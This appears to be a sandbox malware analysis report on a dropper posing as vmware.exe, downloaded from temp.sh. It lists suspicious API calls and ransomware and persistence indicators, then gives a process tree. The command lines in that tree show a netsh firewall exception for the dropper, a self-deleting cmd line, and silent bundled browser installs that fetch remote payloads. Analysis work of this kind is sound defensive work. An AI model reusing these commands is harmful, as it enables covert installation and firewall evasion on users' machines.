Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1756 wrote to memory of 2884 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1756 wrote to memory of 2884 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1756 wrote to memory of 2884 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1756 wrote to memory of 2884 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1756 wrote to memory of 1488 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe
PID 1756 wrote to memory of 1488 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe
PID 1756 wrote to memory of 1488 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe
PID 1488 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\WTLDR.exe
PID 1488 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\WTLDR.exe
PID 1488 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\WTLDR.exe
PID 1488 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\WTLDR.exe
PID 1488 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 1488 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 1488 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 1488 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 1488 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 1488 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 1488 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 2156 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 2156 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 2156 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 2156 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 1108 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe
PID 1108 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe
PID 1108 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe
PID 1108 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe
PID 1568 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1568 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1568 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1568 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1568 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1568 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1568 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 2212 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 2212 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 2212 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 2212 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 2212 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 2212 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 2212 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 2212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 2212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 2212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 2212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 2212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 2212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 2212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1108 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe
PID 1108 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe
PID 1108 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe
PID 1108 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe
PID 1108 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\cmd.exe
PID 1108 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\cmd.exe
PID 1108 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\cmd.exe
PID 1108 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\cmd.exe
PID 2340 wrote to memory of 2372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2340 wrote to memory of 2372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2340 wrote to memory of 2372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2340 wrote to memory of 2372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2556 wrote to memory of 2336 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2556 wrote to memory of 2336 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2556 wrote to memory of 2336 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2556 wrote to memory of 2336 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2556 wrote to memory of 2336 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1756 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe"

C:\Users\Admin\AppData\Local\Temp\WTLDR.exe

"C:\Users\Admin\AppData\Local\Temp\WTLDR.exe"

C:\Users\Admin\AppData\Local\Temp\KLSetup.exe

"C:\Users\Admin\AppData\Local\Temp\KLSetup.exe"

C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe

"C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe" "chrome_protect.exe" ENABLE

C:\Users\Admin\AppData\Local\Temp\yadl.exe

"C:\Users\Admin\AppData\Local\Temp\yadl.exe" --partner 418804 --distr /quiet /msicl "YABROWSER=y YAQSEARCH=y YAHOMEPAGE=y VID=354"

C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe

"C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe" /quiet /msicl "YABROWSER=y YAQSEARCH=y YAHOMEPAGE=y VID=354"

C:\Users\Admin\AppData\Local\Temp\yadl.exe

C:\Users\Admin\AppData\Local\Temp\yadl.exe --stat dwnldr/p=418804/rid=8dbd23b5-3c00-4987-97f5-e26184e3f3be/sbr=0-0/hrc=200-200/bd=267-10639168/gtpr=1-1-1-255-1/cdr=0-b7-b7-ff-b7/for=3-0/fole=255-0/fwle=255-0/vr=ff-800b0109/vle=ff-800b0109/hovr=ff-0/hovle=ff-0/shle=ff-0/vmajor=6/vminor=1/vbuild=7601/distr_type=landing/cnt=0/dt=6/ct=2/rt=0 --dh 1528 --st 1719179742

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\netsh.exe

netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe"

C:\Windows\SysWOW64\PING.EXE

ping 0 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 24DFC157FCC18C17ADA55185C90E525E

C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe"

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe" -version

C:\Windows\system32\icacls.exe

C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

C:\Users\Admin\AppData\Local\Temp\7A211A2D-C79F-453E-9139-561FAC3D7E45\lite_installer.exe

"C:\Users\Admin\AppData\Local\Temp\7A211A2D-C79F-453E-9139-561FAC3D7E45\lite_installer.exe" --use-user-default-locale --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --YABROWSER

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe" -XX:+UseG1GC -Dfile.encoding=UTF-8 -jar "C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe"

C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe

"C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe" "--yqs=y" "--yhp=y" "--ilight=" "--oem=" "--nopin=n" "--pin_custom=n" "--pin_desktop=n" "--pin_taskbar=y" "--locale=us" "--browser=y" "--browser_default=" "--loglevel=trace" "--ess=" "--clids=C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml" "--sender=C:\Users\Admin\AppData\Local\Temp\12A0593A-69BF-4E3D-941E-7C00618D24D1\sender.exe" "--is_elevated=yes" "--ui_level=2" "--good_token=x" "--no_opera=n"

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent --pin-taskbar=y --pin-desktop=n

C:\Users\Admin\AppData\Local\Temp\12A0593A-69BF-4E3D-941E-7C00618D24D1\sender.exe

C:\Users\Admin\AppData\Local\Temp\12A0593A-69BF-4E3D-941E-7C00618D24D1\sender.exe --send "/status.xml?clid=6035492-354&uuid=cd6fd94f-AB17-40A5-842C-61F58DF30afc&vnt=Windows 7x64&file-no=6%0A10%0A11%0A12%0A13%0A15%0A17%0A18%0A21%0A22%0A24%0A25%0A40%0A42%0A43%0A45%0A57%0A61%0A89%0A103%0A111%0A123%0A124%0A125%0A129%0A"

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.exe

java.exe -version

C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe

"C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe" --job-name=yBrowserDownloader-{DB166274-067A-4BF5-95D7-B63D74DD1984} --send-statistics --local-path=C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe --YABROWSER --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui=cd6fd94f-AB17-40A5-842C-61F58DF30afc --use-user-default-locale

C:\Users\Admin\AppData\Local\Temp\yb2B26.tmp

"C:\Users\Admin\AppData\Local\Temp\yb2B26.tmp" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\34b0acab-c04c-4dbc-be58-57d03fa2211b.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=268071600 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{DB166274-067A-4BF5-95D7-B63D74DD1984} --local-path="C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui=cd6fd94f-AB17-40A5-842C-61F58DF30afc --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\ad433c5e-3a65-4bd2-9f77-fbffa02e1fad.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"

C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\34b0acab-c04c-4dbc-be58-57d03fa2211b.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=268071600 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{DB166274-067A-4BF5-95D7-B63D74DD1984} --local-path="C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui=cd6fd94f-AB17-40A5-842C-61F58DF30afc --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\ad433c5e-3a65-4bd2-9f77-fbffa02e1fad.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"

C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\34b0acab-c04c-4dbc-be58-57d03fa2211b.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=268071600 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{DB166274-067A-4BF5-95D7-B63D74DD1984} --local-path="C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui=cd6fd94f-AB17-40A5-842C-61F58DF30afc --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\ad433c5e-3a65-4bd2-9f77-fbffa02e1fad.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico" --verbose-logging --run-as-admin --target-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application" --child-setup-process --restart-as-admin-time=299628600

C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe

C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=a3028db1baffc0578427f8e443889a44 --annotation=main_process_pid=5632 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0x1b0,0x1b4,0x1b8,0x184,0x1bc,0x6c1cbc,0x6c1cc8,0x6c1cd4

